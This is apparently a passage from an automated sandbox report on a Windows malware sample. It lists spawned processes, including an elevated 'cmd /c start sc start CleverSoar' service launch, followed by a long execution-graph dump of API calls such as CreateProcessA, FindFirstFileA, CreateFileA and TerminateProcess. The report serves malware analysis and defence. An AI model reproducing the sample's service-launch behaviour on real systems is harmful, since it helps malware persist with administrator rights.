                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:108
                            Start time:22:53:06
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff7b71e0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Reset < >

                              Execution Graph

                              Execution Coverage:1.6%
                              Dynamic/Decrypted Code Coverage:0%
                              Signature Coverage:15.3%
                              Total number of Nodes:790
                              Total number of Limit Nodes:13
                              execution_graph 100079 6cc6cad3 100080 6cc6cae5 __dosmaperr 100079->100080 100081 6cc6cafd 100079->100081 100081->100080 100082 6cc6cb48 __dosmaperr 100081->100082 100083 6cc6cb77 100081->100083 100126 6cc60120 18 API calls __fassign 100082->100126 100085 6cc6cb90 100083->100085 100087 6cc6cbe7 __wsopen_s 100083->100087 100088 6cc6cbab __dosmaperr 100083->100088 100085->100088 100106 6cc6cb95 100085->100106 100120 6cc647bb HeapFree GetLastError _free 100087->100120 100119 6cc60120 18 API calls __fassign 100088->100119 100089 6cc6cd3e 100092 6cc6cdb4 100089->100092 100095 6cc6cd57 GetConsoleMode 100089->100095 100094 6cc6cdb8 ReadFile 100092->100094 100093 6cc6cc07 100121 6cc647bb HeapFree GetLastError _free 100093->100121 100097 6cc6cdd2 100094->100097 100098 6cc6ce2c GetLastError 100094->100098 100095->100092 100099 6cc6cd68 100095->100099 100097->100098 100102 6cc6cda9 100097->100102 100111 6cc6cbc2 __dosmaperr __wsopen_s 100098->100111 100099->100094 100101 6cc6cd6e ReadConsoleW 100099->100101 100100 6cc6cc0e 100100->100111 100122 6cc6ac69 20 API calls __wsopen_s 100100->100122 100101->100102 100104 6cc6cd8a GetLastError 100101->100104 100107 6cc6cdf7 100102->100107 100108 6cc6ce0e 100102->100108 100102->100111 100104->100111 100114 6cc719e5 100106->100114 100124 6cc6cefe 23 API calls 3 library calls 100107->100124 100110 6cc6ce25 100108->100110 100108->100111 100125 6cc6d1b6 21 API calls __wsopen_s 100110->100125 100123 6cc647bb HeapFree GetLastError _free 100111->100123 100113 6cc6ce2a 100113->100111 100115 6cc719f2 100114->100115 100117 6cc719ff 100114->100117 100115->100089 100116 6cc71a0b 100116->100089 100117->100116 100127 6cc60120 18 API calls __fassign 100117->100127 100119->100111 100120->100093 100121->100100 100122->100106 100123->100080 100124->100111 100125->100113 100126->100080 100127->100115 100128 6cae4a27 100132 6cae4a5d _strlen 100128->100132 100129 6caf639e 100258 6cc60130 18 API calls 2 library calls 100129->100258 100130 6cae5b6f 100135 6cc56a43 std::_Facet_Register 4 API calls 100130->100135 100131 6cae5b58 100244 6cc56a43 100131->100244 100132->100129 100132->100130 100132->100131 100136 6cae5b09 _Yarn 100132->100136 100135->100136 100219 6cc4aec0 100136->100219 100139 6cae5bad std::ios_base::_Ios_base_dtor 100139->100129 100142 6cae9ba5 std::ios_base::_Ios_base_dtor _Yarn _strlen 100139->100142 100223 6cc54ff0 CreateProcessA 100139->100223 100140 6cc56a43 IsProcessorFeaturePresent RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 100140->100142 100141 6cc4aec0 FindFirstFileA 100141->100142 100142->100129 100142->100140 100142->100141 100143 6caea292 Sleep 100142->100143 100162 6caee619 100142->100162 100160 6cae9bb1 std::ios_base::_Ios_base_dtor _Yarn _strlen 100143->100160 100144 6cae660d 100146 6cc56a43 std::_Facet_Register 4 API calls 100144->100146 100145 6cae6624 100147 6cc56a43 std::_Facet_Register 4 API calls 100145->100147 100155 6cae65bc _Yarn _strlen 100146->100155 100147->100155 100148 6cae61cb _strlen 100148->100129 100148->100144 100148->100145 100148->100155 100149 6cae9bbd GetCurrentProcess TerminateProcess 100149->100142 100150 6caf63b2 100259 6cad15e0 18 API calls std::ios_base::_Ios_base_dtor 100150->100259 100152 6caf64f8 100153 6cae6989 100157 6cc56a43 std::_Facet_Register 4 API calls 100153->100157 100154 6cae6970 100156 6cc56a43 std::_Facet_Register 4 API calls 100154->100156 100155->100150 100155->100153 100155->100154 100158 6cae6920 _Yarn 100155->100158 100156->100158 100157->100158 100227 6cc55960 100158->100227 100160->100129 100160->100142 100160->100149 100160->100150 100169 6cc55960 104 API calls 100160->100169 100215 6cc56a43 IsProcessorFeaturePresent RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 100160->100215 100218 6cc54ff0 CreateProcessA WaitForSingleObject CloseHandle CloseHandle 100160->100218 100161 6caef243 CreateFileA 100176 6caef2a7 100161->100176 100162->100161 100163 6cae69d6 std::ios_base::_Ios_base_dtor _strlen 100163->100129 100164 6cae6dbb 100163->100164 100165 6cae6dd2 100163->100165 100178 6cae6d69 _Yarn _strlen 100163->100178 100166 6cc56a43 std::_Facet_Register 4 API calls 100164->100166 100167 6cc56a43 std::_Facet_Register 4 API calls 100165->100167 100166->100178 100167->100178 100168 6caf02ca 100169->100160 100170 6cae7427 100172 6cc56a43 std::_Facet_Register 4 API calls 100170->100172 100171 6cae7440 100173 6cc56a43 std::_Facet_Register 4 API calls 100171->100173 100174 6cae73da _Yarn 100172->100174 100173->100174 100177 6cc55960 104 API calls 100174->100177 100175 6caf02ac GetCurrentProcess TerminateProcess 100175->100168 100176->100168 100176->100175 100179 6cae748d std::ios_base::_Ios_base_dtor _strlen 100177->100179 100178->100150 100178->100170 100178->100171 100178->100174 100179->100129 100180 6cae79a8 100179->100180 100181 6cae7991 100179->100181 100184 6cae7940 _Yarn _strlen 100179->100184 100183 6cc56a43 std::_Facet_Register 4 API calls 100180->100183 100182 6cc56a43 std::_Facet_Register 4 API calls 100181->100182 100182->100184 100183->100184 100184->100150 100185 6cae7d7c _Yarn 100184->100185 100186 6cae7dc9 100184->100186 100187 6cae7de2 100184->100187 100190 6cc55960 104 API calls 100185->100190 100188 6cc56a43 std::_Facet_Register 4 API calls 100186->100188 100189 6cc56a43 std::_Facet_Register 4 API calls 100187->100189 100188->100185 100189->100185 100191 6cae7e2f std::ios_base::_Ios_base_dtor _strlen 100190->100191 100191->100129 100192 6cae85bf 100191->100192 100193 6cae85a8 100191->100193 100201 6cae8556 _Yarn _strlen 100191->100201 100195 6cc56a43 std::_Facet_Register 4 API calls 100192->100195 100194 6cc56a43 std::_Facet_Register 4 API calls 100193->100194 100194->100201 100195->100201 100196 6cae896a 100198 6cc56a43 std::_Facet_Register 4 API calls 100196->100198 100197 6cae8983 100199 6cc56a43 std::_Facet_Register 4 API calls 100197->100199 100200 6cae891d _Yarn 100198->100200 100199->100200 100202 6cc55960 104 API calls 100200->100202 100201->100150 100201->100196 100201->100197 100201->100200 100205 6cae89d0 std::ios_base::_Ios_base_dtor _strlen 100202->100205 100203 6cae8f1f 100206 6cc56a43 std::_Facet_Register 4 API calls 100203->100206 100204 6cae8f36 100207 6cc56a43 std::_Facet_Register 4 API calls 100204->100207 100205->100129 100205->100203 100205->100204 100208 6cae8ecd _Yarn _strlen 100205->100208 100206->100208 100207->100208 100208->100150 100209 6cae936d 100208->100209 100210 6cae9354 100208->100210 100213 6cae9307 _Yarn 100208->100213 100212 6cc56a43 std::_Facet_Register 4 API calls 100209->100212 100211 6cc56a43 std::_Facet_Register 4 API calls 100210->100211 100211->100213 100212->100213 100214 6cc55960 104 API calls 100213->100214 100217 6cae93ba std::ios_base::_Ios_base_dtor 100214->100217 100215->100160 100216 6cc54ff0 4 API calls 100216->100142 100217->100129 100217->100216 100218->100160 100220 6cc4aed4 100219->100220 100221 6cc4aed6 FindFirstFileA 100219->100221 100220->100221 100222 6cc4af10 100221->100222 100222->100139 100224 6cc550ca 100223->100224 100225 6cc55080 WaitForSingleObject CloseHandle CloseHandle 100224->100225 100226 6cc550e3 100224->100226 100225->100224 100226->100148 100228 6cc559b7 100227->100228 100260 6cc55ff0 100228->100260 100230 6cc559c8 100279 6caf6ba0 100230->100279 100232 6cc55a67 100331 6cb1e010 100232->100331 100234 6cc55a9f std::ios_base::_Ios_base_dtor 100236 6cb1e010 67 API calls 100234->100236 100239 6cc55ae2 std::ios_base::_Ios_base_dtor 100236->100239 100237 6cc55a54 100316 6cc55b90 100237->100316 100238 6cc559ec 100238->100232 100238->100237 100298 6cc56340 100238->100298 100306 6cb32000 100238->100306 100239->100163 100242 6cc55a5c 100337 6caf7090 100242->100337 100246 6cc56a48 100244->100246 100245 6cc56a62 100245->100136 100246->100245 100248 6cc56a64 std::_Facet_Register 100246->100248 100790 6cc5f014 EnterCriticalSection LeaveCriticalSection std::_Facet_Register 100246->100790 100249 6cc578c3 std::_Facet_Register 100248->100249 100791 6cc59379 RaiseException 100248->100791 100794 6cc59379 RaiseException 100249->100794 100251 6cc580bc IsProcessorFeaturePresent 100257 6cc580e1 100251->100257 100253 6cc57883 100792 6cc59379 RaiseException 100253->100792 100255 6cc578a3 std::invalid_argument::invalid_argument 100793 6cc59379 RaiseException 100255->100793 100257->100136 100259->100152 100261 6cc56025 100260->100261 100350 6cb22020 100261->100350 100263 6cc560c6 100264 6cc56a43 std::_Facet_Register 4 API calls 100263->100264 100265 6cc560fe 100264->100265 100367 6cc57327 100265->100367 100267 6cc56112 100379 6cb21d90 100267->100379 100270 6cc561ec 100270->100230 100272 6cc56226 100387 6cb226e0 24 API calls 4 library calls 100272->100387 100274 6cc56238 100388 6cc59379 RaiseException 100274->100388 100276 6cc5624d 100277 6cb1e010 67 API calls 100276->100277 100278 6cc5625f 100277->100278 100278->100230 100280 6caf6bd5 100279->100280 100281 6cb22020 52 API calls 100280->100281 100282 6caf6c68 100281->100282 100283 6cc56a43 std::_Facet_Register 4 API calls 100282->100283 100284 6caf6ca0 100283->100284 100285 6cc57327 43 API calls 100284->100285 100286 6caf6cb4 100285->100286 100287 6cb21d90 89 API calls 100286->100287 100289 6caf6d5d 100287->100289 100288 6caf6d8e 100288->100238 100289->100288 100698 6cb22250 30 API calls 100289->100698 100291 6caf6dc8 100699 6cb226e0 24 API calls 4 library calls 100291->100699 100293 6caf6dda 100700 6cc59379 RaiseException 100293->100700 100295 6caf6def 100296 6cb1e010 67 API calls 100295->100296 100297 6caf6e0f 100296->100297 100297->100238 100299 6cc5638d 100298->100299 100701 6cc565a0 100299->100701 100301 6cc5647c 100301->100238 100304 6cc563a5 100304->100301 100719 6cb22250 30 API calls 100304->100719 100720 6cb226e0 24 API calls 4 library calls 100304->100720 100721 6cc59379 RaiseException 100304->100721 100307 6cb3203f 100306->100307 100312 6cb32053 100307->100312 100730 6cb23560 32 API calls std::_Xinvalid_argument 100307->100730 100308 6cb3210e 100311 6cb32121 100308->100311 100731 6cb237e0 32 API calls std::_Xinvalid_argument 100308->100731 100311->100238 100312->100308 100732 6cb22250 30 API calls 100312->100732 100733 6cb226e0 24 API calls 4 library calls 100312->100733 100734 6cc59379 RaiseException 100312->100734 100317 6cc55b9e 100316->100317 100320 6cc55bd1 100316->100320 100735 6cb201f0 100317->100735 100318 6cc55c83 100318->100242 100320->100318 100739 6cb22250 30 API calls 100320->100739 100323 6cc60b18 67 API calls 100323->100320 100324 6cc55cae 100740 6cb22340 24 API calls 100324->100740 100326 6cc55cbe 100741 6cc59379 RaiseException 100326->100741 100328 6cc55cc9 100329 6cb1e010 67 API calls 100328->100329 100330 6cc55d22 std::ios_base::_Ios_base_dtor 100329->100330 100330->100242 100332 6cb1e04b 100331->100332 100333 6cb1e0a3 100332->100333 100334 6cb201f0 64 API calls 100332->100334 100333->100234 100335 6cb1e098 100334->100335 100336 6cc60b18 67 API calls 100335->100336 100336->100333 100338 6caf709e 100337->100338 100344 6caf70d1 100337->100344 100339 6cb201f0 64 API calls 100338->100339 100341 6caf70c4 100339->100341 100340 6caf7183 100340->100232 100342 6cc60b18 67 API calls 100341->100342 100342->100344 100344->100340 100787 6cb22250 30 API calls 100344->100787 100345 6caf71ae 100788 6cb22340 24 API calls 100345->100788 100347 6caf71be 100789 6cc59379 RaiseException 100347->100789 100349 6caf71c9 100351 6cc56a43 std::_Facet_Register 4 API calls 100350->100351 100352 6cb2207e 100351->100352 100353 6cc57327 43 API calls 100352->100353 100354 6cb22092 100353->100354 100389 6cb22f60 42 API calls 4 library calls 100354->100389 100356 6cb220c8 100357 6cb2210d 100356->100357 100358 6cb22136 100356->100358 100359 6cb22120 100357->100359 100390 6cc56f8e 9 API calls 2 library calls 100357->100390 100391 6cb22250 30 API calls 100358->100391 100359->100263 100362 6cb2215b 100392 6cb22340 24 API calls 100362->100392 100364 6cb22171 100393 6cc59379 RaiseException 100364->100393 100366 6cb2217c 100366->100263 100368 6cc57333 __EH_prolog3 100367->100368 100394 6cc56eb5 100368->100394 100371 6cc5736f 100400 6cc56ee6 100371->100400 100373 6cc57351 100408 6cc573ba 39 API calls std::locale::_Setgloballocale 100373->100408 100376 6cc57359 100409 6cc571b1 HeapFree GetLastError _Yarn 100376->100409 100377 6cc573ac 100377->100267 100380 6cb21dc7 100379->100380 100381 6cb21ddc 100379->100381 100380->100270 100386 6cb22250 30 API calls 100380->100386 100414 6cc57447 100381->100414 100385 6cb21e82 100386->100272 100387->100274 100388->100276 100389->100356 100390->100359 100391->100362 100392->100364 100393->100366 100395 6cc56ec4 100394->100395 100396 6cc56ecb 100394->100396 100410 6cc603cd 6 API calls std::_Lockit::_Lockit 100395->100410 100398 6cc56ec9 100396->100398 100411 6cc5858b EnterCriticalSection 100396->100411 100398->100371 100407 6cc57230 6 API calls 2 library calls 100398->100407 100401 6cc603db 100400->100401 100403 6cc56ef0 100400->100403 100413 6cc603b6 LeaveCriticalSection 100401->100413 100404 6cc56f03 100403->100404 100412 6cc58599 LeaveCriticalSection 100403->100412 100404->100377 100405 6cc603e2 100405->100377 100407->100373 100408->100376 100409->100371 100410->100398 100411->100398 100412->100404 100413->100405 100415 6cc57450 100414->100415 100416 6cb21dea 100415->100416 100423 6cc5fd4a 100415->100423 100416->100380 100422 6cc5c563 18 API calls __fassign 100416->100422 100418 6cc5749c 100418->100416 100434 6cc5fa58 65 API calls 100418->100434 100420 6cc574b7 100420->100416 100435 6cc60b18 100420->100435 100422->100385 100424 6cc5fd55 __wsopen_s 100423->100424 100425 6cc5fd88 100424->100425 100426 6cc5fd68 100424->100426 100430 6cc5fd78 100425->100430 100446 6cc6ae0c 100425->100446 100460 6cc60120 18 API calls __fassign 100426->100460 100430->100418 100434->100420 100436 6cc60b24 __wsopen_s 100435->100436 100437 6cc60b43 100436->100437 100438 6cc60b2e 100436->100438 100442 6cc60b3e 100437->100442 100569 6cc5c5a9 EnterCriticalSection 100437->100569 100584 6cc60120 18 API calls __fassign 100438->100584 100441 6cc60b60 100570 6cc60b9c 100441->100570 100442->100416 100444 6cc60b6b 100585 6cc60b92 LeaveCriticalSection 100444->100585 100447 6cc6ae18 __wsopen_s 100446->100447 100462 6cc6039f EnterCriticalSection 100447->100462 100449 6cc6ae26 100463 6cc6aeb0 100449->100463 100454 6cc6af72 100455 6cc6b091 100454->100455 100487 6cc6b114 100455->100487 100458 6cc5fdcc 100461 6cc5fdf5 LeaveCriticalSection 100458->100461 100460->100430 100461->100430 100462->100449 100470 6cc6aed3 100463->100470 100464 6cc6af2b 100482 6cc671e5 EnterCriticalSection LeaveCriticalSection HeapAlloc __Getctype std::_Facet_Register 100464->100482 100466 6cc6af34 100483 6cc647bb HeapFree GetLastError _free 100466->100483 100469 6cc6af3d 100472 6cc6ae33 100469->100472 100484 6cc66c1f 6 API calls std::_Lockit::_Lockit 100469->100484 100470->100464 100470->100470 100470->100472 100480 6cc5c5a9 EnterCriticalSection 100470->100480 100481 6cc5c5bd LeaveCriticalSection 100470->100481 100477 6cc6ae6c 100472->100477 100474 6cc6af5c 100485 6cc5c5a9 EnterCriticalSection 100474->100485 100476 6cc6af6f 100476->100472 100486 6cc603b6 LeaveCriticalSection 100477->100486 100479 6cc5fda3 100479->100430 100479->100454 100480->100470 100481->100470 100482->100466 100483->100469 100484->100474 100485->100476 100486->100479 100488 6cc6b133 100487->100488 100489 6cc6b146 100488->100489 100493 6cc6b15b 100488->100493 100503 6cc60120 18 API calls __fassign 100489->100503 100491 6cc6b0a7 100491->100458 100500 6cc73fde 100491->100500 100498 6cc6b27b 100493->100498 100504 6cc73ea8 37 API calls __fassign 100493->100504 100495 6cc6b2cb 100495->100498 100505 6cc73ea8 37 API calls __fassign 100495->100505 100497 6cc6b2e9 100497->100498 100506 6cc73ea8 37 API calls __fassign 100497->100506 100498->100491 100507 6cc60120 18 API calls __fassign 100498->100507 100508 6cc74396 100500->100508 100503->100491 100504->100495 100505->100497 100506->100498 100507->100491 100510 6cc743a2 __wsopen_s 100508->100510 100509 6cc743a9 100526 6cc60120 18 API calls __fassign 100509->100526 100510->100509 100511 6cc743d4 100510->100511 100517 6cc73ffe 100511->100517 100516 6cc73ff9 100516->100458 100528 6cc606cb 100517->100528 100523 6cc74034 100524 6cc74066 100523->100524 100568 6cc647bb HeapFree GetLastError _free 100523->100568 100527 6cc7442b LeaveCriticalSection __wsopen_s 100524->100527 100526->100516 100527->100516 100529 6cc5bceb __fassign 37 API calls 100528->100529 100530 6cc606dd 100529->100530 100531 6cc606ef 100530->100531 100532 6cc669d5 __wsopen_s 5 API calls 100530->100532 100533 6cc5bdf6 100531->100533 100532->100531 100534 6cc5be4e __wsopen_s GetLastError HeapFree GetLastError MultiByteToWideChar 100533->100534 100535 6cc5be0e 100534->100535 100535->100523 100536 6cc7406c 100535->100536 100537 6cc744ec __wsopen_s 18 API calls 100536->100537 100538 6cc74089 100537->100538 100539 6cc7160c __wsopen_s 14 API calls 100538->100539 100542 6cc7409e __dosmaperr 100538->100542 100540 6cc740bc 100539->100540 100541 6cc74457 __wsopen_s CreateFileW 100540->100541 100540->100542 100548 6cc74115 100541->100548 100542->100523 100543 6cc74192 GetFileType 100544 6cc741e4 100543->100544 100545 6cc7419d GetLastError 100543->100545 100551 6cc717b0 __wsopen_s SetStdHandle 100544->100551 100547 6cc5f9f2 __dosmaperr 100545->100547 100546 6cc74167 GetLastError 100546->100542 100549 6cc741ab CloseHandle 100547->100549 100548->100543 100548->100546 100550 6cc74457 __wsopen_s CreateFileW 100548->100550 100549->100542 100564 6cc741d4 100549->100564 100552 6cc7415a 100550->100552 100553 6cc74205 100551->100553 100552->100543 100552->100546 100554 6cc74251 100553->100554 100555 6cc74666 __wsopen_s 70 API calls 100553->100555 100556 6cc74710 __wsopen_s 70 API calls 100554->100556 100558 6cc74258 100554->100558 100555->100554 100557 6cc74286 100556->100557 100557->100558 100559 6cc74294 100557->100559 100560 6cc6b925 __wsopen_s 21 API calls 100558->100560 100559->100542 100561 6cc74310 CloseHandle 100559->100561 100560->100542 100562 6cc74457 __wsopen_s CreateFileW 100561->100562 100563 6cc7433b 100562->100563 100563->100564 100565 6cc74345 GetLastError 100563->100565 100564->100542 100566 6cc74351 __dosmaperr 100565->100566 100567 6cc7171f __wsopen_s SetStdHandle 100566->100567 100567->100564 100568->100524 100569->100441 100571 6cc60ba9 100570->100571 100572 6cc60bbe 100570->100572 100608 6cc60120 18 API calls __fassign 100571->100608 100576 6cc60bb9 100572->100576 100586 6cc60cb9 100572->100586 100576->100444 100580 6cc60be1 100601 6cc6b898 100580->100601 100582 6cc60be7 100582->100576 100609 6cc647bb HeapFree GetLastError _free 100582->100609 100584->100442 100585->100442 100587 6cc60cd1 100586->100587 100588 6cc60bd3 100586->100588 100587->100588 100589 6cc69c60 18 API calls 100587->100589 100592 6cc6873e 100588->100592 100590 6cc60cef 100589->100590 100610 6cc6bb6c 100590->100610 100593 6cc68755 100592->100593 100594 6cc60bdb 100592->100594 100593->100594 100666 6cc647bb HeapFree GetLastError _free 100593->100666 100596 6cc69c60 100594->100596 100597 6cc69c81 100596->100597 100598 6cc69c6c 100596->100598 100597->100580 100667 6cc60120 18 API calls __fassign 100598->100667 100600 6cc69c7c 100600->100580 100602 6cc6b8be 100601->100602 100605 6cc6b8a9 __dosmaperr 100601->100605 100603 6cc6b8e5 100602->100603 100606 6cc6b907 __dosmaperr 100602->100606 100668 6cc6b9c1 100603->100668 100605->100582 100676 6cc60120 18 API calls __fassign 100606->100676 100608->100576 100609->100576 100611 6cc6bb78 __wsopen_s 100610->100611 100612 6cc6bbca 100611->100612 100613 6cc6bc33 __dosmaperr 100611->100613 100617 6cc6bb80 __dosmaperr 100611->100617 100621 6cc71990 EnterCriticalSection 100612->100621 100651 6cc60120 18 API calls __fassign 100613->100651 100615 6cc6bbd0 100619 6cc6bbec __dosmaperr 100615->100619 100622 6cc6bc5e 100615->100622 100617->100588 100650 6cc6bc2b LeaveCriticalSection __wsopen_s 100619->100650 100621->100615 100623 6cc6bc80 100622->100623 100649 6cc6bc9c __dosmaperr 100622->100649 100624 6cc6bcd4 100623->100624 100625 6cc6bc84 __dosmaperr 100623->100625 100626 6cc6bce7 100624->100626 100660 6cc6ac69 20 API calls __wsopen_s 100624->100660 100659 6cc60120 18 API calls __fassign 100625->100659 100652 6cc6be40 100626->100652 100631 6cc6bd3c 100633 6cc6bd95 WriteFile 100631->100633 100634 6cc6bd50 100631->100634 100632 6cc6bcfd 100635 6cc6bd26 100632->100635 100636 6cc6bd01 100632->100636 100637 6cc6bdb9 GetLastError 100633->100637 100633->100649 100639 6cc6bd85 100634->100639 100640 6cc6bd5b 100634->100640 100662 6cc6beb1 43 API calls 5 library calls 100635->100662 100636->100649 100661 6cc6c25b 6 API calls __wsopen_s 100636->100661 100637->100649 100665 6cc6c2c3 7 API calls 2 library calls 100639->100665 100643 6cc6bd75 100640->100643 100644 6cc6bd60 100640->100644 100664 6cc6c487 8 API calls 3 library calls 100643->100664 100646 6cc6bd65 100644->100646 100644->100649 100645 6cc6bd73 100645->100649 100663 6cc6c39e 7 API calls 2 library calls 100646->100663 100649->100619 100650->100617 100651->100617 100653 6cc719e5 __wsopen_s 18 API calls 100652->100653 100655 6cc6be51 100653->100655 100654 6cc6bcf8 100654->100631 100654->100632 100655->100654 100656 6cc649b2 __Getctype 37 API calls 100655->100656 100657 6cc6be74 100656->100657 100657->100654 100658 6cc6be8e GetConsoleMode 100657->100658 100658->100654 100659->100649 100660->100626 100661->100649 100662->100649 100663->100645 100664->100645 100665->100645 100666->100594 100667->100600 100669 6cc6b9cd __wsopen_s 100668->100669 100677 6cc71990 EnterCriticalSection 100669->100677 100671 6cc6b9db 100673 6cc6ba08 100671->100673 100678 6cc6b925 100671->100678 100691 6cc6ba41 LeaveCriticalSection __wsopen_s 100673->100691 100675 6cc6ba2a 100675->100605 100676->100605 100677->100671 100692 6cc715a2 100678->100692 100680 6cc6b935 100681 6cc6b93b 100680->100681 100682 6cc6b96d 100680->100682 100684 6cc715a2 __wsopen_s 18 API calls 100680->100684 100697 6cc7171f SetStdHandle __dosmaperr __wsopen_s 100681->100697 100682->100681 100685 6cc715a2 __wsopen_s 18 API calls 100682->100685 100686 6cc6b964 100684->100686 100687 6cc6b979 CloseHandle 100685->100687 100688 6cc715a2 __wsopen_s 18 API calls 100686->100688 100687->100681 100689 6cc6b985 GetLastError 100687->100689 100688->100682 100689->100681 100690 6cc6b993 __dosmaperr 100690->100673 100691->100675 100693 6cc715c4 __dosmaperr 100692->100693 100694 6cc715af __dosmaperr 100692->100694 100695 6cc715e9 100693->100695 100696 6cc60120 __fassign 18 API calls 100693->100696 100694->100680 100695->100680 100696->100694 100697->100690 100698->100291 100699->100293 100700->100295 100702 6cc565dc 100701->100702 100703 6cc56608 100701->100703 100717 6cc56601 100702->100717 100724 6cb22250 30 API calls 100702->100724 100709 6cc56619 100703->100709 100722 6cb23560 32 API calls std::_Xinvalid_argument 100703->100722 100706 6cc567e8 100725 6cb22340 24 API calls 100706->100725 100708 6cc567f7 100726 6cc59379 RaiseException 100708->100726 100709->100717 100723 6cb22f60 42 API calls 4 library calls 100709->100723 100713 6cc56827 100728 6cb22340 24 API calls 100713->100728 100715 6cc5683d 100729 6cc59379 RaiseException 100715->100729 100717->100304 100718 6cc56653 100718->100717 100727 6cb22250 30 API calls 100718->100727 100719->100304 100720->100304 100721->100304 100722->100709 100723->100718 100724->100706 100725->100708 100726->100718 100727->100713 100728->100715 100729->100717 100730->100312 100731->100311 100732->100312 100733->100312 100734->100312 100737 6cb2022e 100735->100737 100736 6cb204d6 100736->100323 100737->100736 100742 6cc617db 100737->100742 100739->100324 100740->100326 100741->100328 100743 6cc61806 100742->100743 100744 6cc617e9 100742->100744 100743->100737 100744->100743 100745 6cc617f6 100744->100745 100746 6cc6180a 100744->100746 100758 6cc60120 18 API calls __fassign 100745->100758 100750 6cc61a02 100746->100750 100751 6cc61a0e __wsopen_s 100750->100751 100759 6cc5c5a9 EnterCriticalSection 100751->100759 100753 6cc61a1c 100760 6cc619bf 100753->100760 100757 6cc6183c 100757->100737 100758->100743 100759->100753 100768 6cc685a6 100760->100768 100766 6cc619f9 100767 6cc61a51 LeaveCriticalSection 100766->100767 100767->100757 100769 6cc69c60 18 API calls 100768->100769 100770 6cc685b7 100769->100770 100771 6cc719e5 __wsopen_s 18 API calls 100770->100771 100773 6cc685bd __wsopen_s 100771->100773 100772 6cc619d3 100775 6cc6183e 100772->100775 100773->100772 100785 6cc647bb HeapFree GetLastError _free 100773->100785 100777 6cc61850 100775->100777 100779 6cc6186e 100775->100779 100776 6cc6185e 100786 6cc60120 18 API calls __fassign 100776->100786 100777->100776 100777->100779 100782 6cc61886 _Yarn 100777->100782 100784 6cc68659 62 API calls 100779->100784 100780 6cc60cb9 62 API calls 100780->100782 100781 6cc69c60 18 API calls 100781->100782 100782->100779 100782->100780 100782->100781 100783 6cc6bb6c __wsopen_s 62 API calls 100782->100783 100783->100782 100784->100766 100785->100772 100786->100779 100787->100345 100788->100347 100789->100349 100790->100246 100791->100253 100792->100255 100793->100249 100794->100251 100795 6cc5ef3f 100796 6cc5ef4b __wsopen_s 100795->100796 100797 6cc5ef52 GetLastError ExitThread 100796->100797 100798 6cc5ef5f 100796->100798 100807 6cc649b2 GetLastError 100798->100807 100803 6cc5ef7b 100840 6cc5eeaa 16 API calls 2 library calls 100803->100840 100806 6cc5ef9d 100808 6cc649c9 100807->100808 100813 6cc649cf 100807->100813 100841 6cc66b23 6 API calls std::_Lockit::_Lockit 100808->100841 100811 6cc649ed 100812 6cc649d5 SetLastError 100811->100812 100814 6cc649f1 100811->100814 100820 6cc5ef64 100812->100820 100821 6cc64a69 100812->100821 100813->100812 100842 6cc66b62 6 API calls std::_Lockit::_Lockit 100813->100842 100843 6cc671e5 EnterCriticalSection LeaveCriticalSection HeapAlloc __Getctype std::_Facet_Register 100814->100843 100817 6cc649fd 100818 6cc64a05 100817->100818 100819 6cc64a1c 100817->100819 100844 6cc66b62 6 API calls std::_Lockit::_Lockit 100818->100844 100846 6cc66b62 6 API calls std::_Lockit::_Lockit 100819->100846 100834 6cc69d66 100820->100834 100849 6cc60ac9 37 API calls std::locale::_Setgloballocale 100821->100849 100826 6cc64a28 100828 6cc64a2c 100826->100828 100829 6cc64a3d 100826->100829 100827 6cc64a13 100845 6cc647bb HeapFree GetLastError _free 100827->100845 100847 6cc66b62 6 API calls std::_Lockit::_Lockit 100828->100847 100848 6cc647bb HeapFree GetLastError _free 100829->100848 100832 6cc64a19 100832->100812 100835 6cc69d78 GetPEB 100834->100835 100836 6cc5ef6f 100834->100836 100835->100836 100837 6cc69d8b 100835->100837 100836->100803 100839 6cc66d6f 5 API calls std::_Lockit::_Lockit 100836->100839 100850 6cc66e18 5 API calls std::_Lockit::_Lockit 100837->100850 100839->100803 100840->100806 100841->100813 100842->100811 100843->100817 100844->100827 100845->100832 100846->100826 100847->100827 100848->100832 100850->100836 100851 6cae3b72 100852 6cc56a43 std::_Facet_Register 4 API calls 100851->100852 100860 6cae37e0 std::ios_base::_Ios_base_dtor _Yarn _strlen 100852->100860 100853 6cc4aec0 FindFirstFileA 100853->100860 100854 6caf639e 100874 6cc60130 18 API calls 2 library calls 100854->100874 100856 6caf6ba0 104 API calls 100856->100860 100858 6caf7090 77 API calls 100858->100860 100859 6cb1e010 67 API calls 100859->100860 100860->100853 100860->100854 100860->100856 100860->100858 100860->100859 100864 6caf6e60 100860->100864 100865 6caf6e9f 100864->100865 100868 6caf6eb3 100865->100868 100875 6cb23560 32 API calls std::_Xinvalid_argument 100865->100875 100871 6caf6f5b 100868->100871 100877 6cb22250 30 API calls 100868->100877 100878 6cb226e0 24 API calls 4 library calls 100868->100878 100879 6cc59379 RaiseException 100868->100879 100870 6caf6f6e 100870->100860 100871->100870 100876 6cb237e0 32 API calls std::_Xinvalid_argument 100871->100876 100875->100868 100876->100870 100877->100868 100878->100868 100879->100868 100880 6caef8a3 100882 6caef887 100880->100882 100881 6caf02ac GetCurrentProcess TerminateProcess 100883 6caf02ca 100881->100883 100882->100881 100884 6cad4b53 100885 6cc56a43 std::_Facet_Register 4 API calls 100884->100885 100886 6cad4b5c _Yarn 100885->100886 100887 6cc4aec0 FindFirstFileA 100886->100887 100892 6cad4bae std::ios_base::_Ios_base_dtor 100887->100892 100888 6caf639e 101065 6cc60130 18 API calls 2 library calls 100888->101065 100890 6cad4cff 100891 6cad5164 CreateFileA CloseHandle 100896 6cad51ec 100891->100896 100892->100888 100892->100890 100892->100891 100893 6cae245a _Yarn _strlen 100892->100893 100893->100888 100894 6cc4aec0 FindFirstFileA 100893->100894 100910 